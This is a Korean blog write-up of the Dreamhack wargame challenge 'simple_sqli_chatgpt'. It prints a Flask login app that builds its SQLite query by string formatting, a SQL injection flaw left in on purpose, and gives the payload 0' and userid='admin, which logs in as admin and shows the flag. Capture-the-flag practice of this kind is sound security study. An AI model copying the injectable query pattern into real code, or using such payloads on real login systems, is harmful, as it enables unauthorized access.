[Dreamhack] 드림핵 웹해킹: simple_sqli

🔒 Cyber Security/Web Hacking (웹해킹)

[Dreamhack] 드림핵 웹해킹: simple_sqli_chatgpt

선달 2023. 11. 20. 17:06

https://dreamhack.io/wargame/challenges/769

simple_sqli_chatgpt

어딘가 이상한 로그인 서비스입니다. SQL INJECTION 취약점을 통해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다. chatGPT와 함께 풀어보세요! Reference Server-side Basic

dreamhack.io

문제설명

어딘가 이상한 로그인 서비스입니다.
SQL INJECTION 취약점을 통해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다.
chatGPT와 함께 풀어보세요!

#!/usr/bin/python3
from flask import Flask, request, render_template, g
import sqlite3
import os
import binascii

app = Flask(__name__)
app.secret_key = os.urandom(32)

try:
    FLAG = open('./flag.txt', 'r').read()
except:
    FLAG = '[**FLAG**]'

DATABASE = "database.db"
if os.path.exists(DATABASE) == False:
    db = sqlite3.connect(DATABASE)
    db.execute('create table users(userid char(100), userpassword char(100), userlevel integer);')
    db.execute(f'insert into users(userid, userpassword, userlevel) values ("guest", "guest", 0), ("admin", "{binascii.hexlify(os.urandom(16)).decode("utf8")}", 0);')
    db.commit()
    db.close()

def get_db():
    db = getattr(g, '_database', None)
    if db is None:
        db = g._database = sqlite3.connect(DATABASE)
    db.row_factory = sqlite3.Row
    return db

def query_db(query, one=True):
    cur = get_db().execute(query)
    rv = cur.fetchall()
    cur.close()
    return (rv[0] if rv else None) if one else rv

@app.teardown_appcontext
def close_connection(exception):
    db = getattr(g, '_database', None)
    if db is not None:
        db.close()

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    else:
        userlevel = request.form.get('userlevel')
        res = query_db(f"select * from users where userlevel=''")
        if res:
            userid = res[0]
            userlevel = res[2]
            print(userid, userlevel)
            if userid == 'admin' and userlevel == 0:
                return f'hello {userid} flag is {FLAG}'
            return f'<script>alert("hello {userid}");history.go(-1);</script>'
        return '<script>alert("wrong");history.go(-1);</script>'

app.run(host='0.0.0.0', port=8000)

풀이

진짜 뭔가 이상한 로그인 서비스다

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    else:
        userlevel = request.form.get('userlevel')
        res = query_db(f"select * from users where userlevel='{userlevel}'")
        if res:
            userid = res[0]
            userlevel = res[2]
            print(userid, userlevel)
            if userid == 'admin' and userlevel == 0:
                return f'hello {userid} flag is {FLAG}'
            return f'<script>alert("hello {userid}");history.go(-1);</script>'
        return '<script>alert("wrong");history.go(-1);</script>'

문제가 좀 긴데 결국은 userid가 admin이고 userlevel이 0인 경우에 폼을 제출하면 플래그를 보여준다는 뜻이다

select * from users where userlevel='{userlevel}'

이게 SQL 구문

select * from users where userlevel='0' and userid='admin'

0' and userid='admin

이걸 userlevel 부분에 넣으면 조건에 맞게 쿼리가 들어간다

너무 간단해서 의심스러운 문제

'🔒 Cyber Security > Web Hacking (웹해킹)' 카테고리의 다른 글

[Dreamhack] 드림핵 웹해킹: simple-ssti (0)	2023.11.17
[Dreamhack] 드림핵 웹해킹 : phpreg (0)	2023.11.06
[DreamHack] 드림핵 웹해킹 : ex-reg-ex (0)	2023.11.06
[Dreamhack] 드림핵 웹해킹 : Flying Chars (2)	2023.11.03
[DreamHack] 드림핵 웹해킹 php-1 (1)	2023.11.02

현재글[Dreamhack] 드림핵 웹해킹: simple_sqli_chatgpt

Seondalgorithm

[Dreamhack] 드림핵 웹해킹: simple_sqli_chatgpt

문제설명

풀이

'🔒 Cyber Security > Web Hacking (웹해킹)' 카테고리의 다른 글

'🔒 Cyber Security/Web Hacking (웹해킹)'의 다른글

티스토리툴바

[Dreamhack] 드림핵 웹해킹: simple_sqli_chatgpt

문제설명

풀이

'🔒 Cyber Security > Web Hacking (웹해킹)' 카테고리의 다른 글

'🔒 Cyber Security/Web Hacking (웹해킹)'의 다른글

관련글

티스토리툴바